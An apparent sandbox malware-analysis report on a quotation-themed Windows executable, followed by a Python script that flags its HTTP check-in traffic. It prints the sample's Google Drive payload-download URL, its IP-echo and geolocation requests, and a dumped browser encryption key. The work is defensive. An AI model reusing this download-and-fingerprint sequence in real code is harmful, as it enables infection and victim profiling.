Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 131_2_37B95F15
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B925A7h | 131_2_37B92300
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9841Fh | 131_2_37B98178
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B929FFh | 131_2_37B92758
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B90FEFh | 131_2_37B90D48
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B93B5Fh | 131_2_37B938B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9AB5Fh | 131_2_37B9A8B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9214Fh | 131_2_37B91EA8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9073Fh | 131_2_37B90498
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B99127h | 131_2_37B98E80
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B97F9Fh | 131_2_37B97CF8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B90B97h | 131_2_37B908F0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9957Fh | 131_2_37B992D8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B98CCFh | 131_2_37B98A28
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9A2AFh | 131_2_37B9A008
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B932AFh | 131_2_37B93008
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B9A707h | 131_2_37B9A460
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B93707h | 131_2_37B93460
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B91CF7h | 131_2_37B91A50
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe | Code function: 4x nop then jmp 37B902E7h | 131_2_37B90040
Source: global traffic | HTTP traffic detected:
    GET /xml/149.18.24.104 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /xml/149.18.24.104 HTTP/1.1
    Host: reallyfreegeoip.org
Source: Joe Sandbox View | IP Address: 158.101.44.242
Source: Joe Sandbox View | IP Address: 172.67.177.134
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
            Source: global traffic | DNS traffic detected: DNS query: drive.google.com
            Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D69000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: z1QuotationSheetVSAA6656776.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: z1QuotationSheetVSAA6656776.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917798214.0000000006260000.00000004.00001000.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004475000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/z
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004495000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download5
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/lB
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104$
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: unknown | Network traffic detected: HTTP traffic on port 443 to and from local ports 49779, 49780 and 49782-49789 (20 entries, one per direction for each connection)
            Source: unknown | HTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2
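            The traffic above is a recognisable check-in sequence: the payload is fetched from Google Drive with a Firefox User-Agent, the sample then polls checkip.dyndns.org nine times with a fixed, very old IE6 User-Agent, and finally asks reallyfreegeoip.org to geolocate the address the echo service returned, sending no User-Agent at all. Those are the observations behind the "May check the online IP address of the machine", "Tries to detect the country of the analysis system" and "HTTP GET or POST without a user agent" signatures. The Python below is an added example, not part of the Joe Sandbox report: it raises those findings from raw HTTP/1.1 requests. The sample requests are transcribed from the traffic lines above (repeat counts included); the host lists and finding names are the example's own choices.

```python
"""Raise detections from the HTTP check-in traffic listed above.

Added example; not part of the Joe Sandbox report. The sample requests are
transcribed from the report's traffic lines and re-expanded into raw HTTP/1.1
text (CRLF line endings), the form a proxy or network sensor actually sees.
"""
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Host lists are this example's own choices, seeded from the report.
IP_ECHO_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}  # answers "what is my public IP?"
GEOIP_HOSTS = {"reallyfreegeoip.org"}                          # geolocates the IP in the path
CLOUD_STAGING_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
IPV4_IN_PATH = re.compile(r"/(\d{1,3}(?:\.\d{1,3}){3})(?:/|$)")

FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
MSIE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"


def request(method, path, host, user_agent=None):
    """Build a raw request with exactly the headers the report lists."""
    lines = [f"{method} {path} HTTP/1.1"]
    if user_agent:
        lines.append(f"User-Agent: {user_agent}")
    lines.append(f"Host: {host}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


# Transcribed from the traffic lines above, repeat counts included.
SAMPLE_REQUESTS = (
    [request("GET", "/uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC",
             "drive.google.com", FIREFOX_UA),
     request("GET", "/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download",
             "drive.usercontent.google.com", FIREFOX_UA)]
    + [request("GET", "/", "checkip.dyndns.org", MSIE6_UA)] * 9
    + [request("GET", "/xml/149.18.24.104", "reallyfreegeoip.org")] * 8
)


def parse_request(raw):
    """Split one HTTP/1.1 request into method, path, host and lower-cased headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path,
            "host": headers.get("host", "").lower(), "headers": headers}


def analyse(raw_requests):
    """Return the findings a detection engineer would raise on this traffic."""
    reqs = [parse_request(r) for r in raw_requests]
    findings = {}

    echo_hits = sum(r["host"] in IP_ECHO_HOSTS for r in reqs)
    if echo_hits:
        findings["ip_echo_lookups"] = echo_hits  # repeated hits = a polling loop, not a one-off

    for r in reqs:
        if r["host"] in GEOIP_HOSTS:
            m = IPV4_IN_PATH.search(r["path"])
            if m and ipaddress.ip_address(m.group(1)).is_global:
                # A routable address in the path is the one the echo service just
                # returned: the sample is fingerprinting the box it runs on.
                findings["geoip_of_public_ip"] = m.group(1)
        if r["host"] in CLOUD_STAGING_HOSTS:
            query = parse_qs(urlsplit(r["path"]).query)
            if query.get("export") == ["download"] and query.get("id"):
                findings["cloud_staged_payload_id"] = query["id"][0]

    no_ua = sorted({r["host"] for r in reqs if "user-agent" not in r["headers"]})
    if no_ua:
        findings["hosts_without_user_agent"] = no_ua

    agents = Counter(r["headers"]["user-agent"] for r in reqs if "user-agent" in r["headers"])
    if len(agents) > 1:
        findings["distinct_user_agents"] = sorted(agents)
    if any("MSIE 6.0" in ua for ua in agents):
        # No browser on a current Windows host sends an IE6 string; it is hard-coded.
        findings["hardcoded_legacy_user_agent"] = True
    return findings


if __name__ == "__main__":
    for name, value in analyse(SAMPLE_REQUESTS).items():
        print(f"{name}: {value}")
```

            Run on the transcribed requests it reports nine IP-echo lookups, the geolocated public address 149.18.24.104, the Drive file id of the staged payload, reallyfreegeoip.org as the host contacted without a User-Agent, and two different User-Agent strings from one process. Any single finding is weak on its own (plenty of legitimate software asks checkip.dyndns.org for its address); the value is in the sequence, which is why the function collects all of them rather than returning on the first hit.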
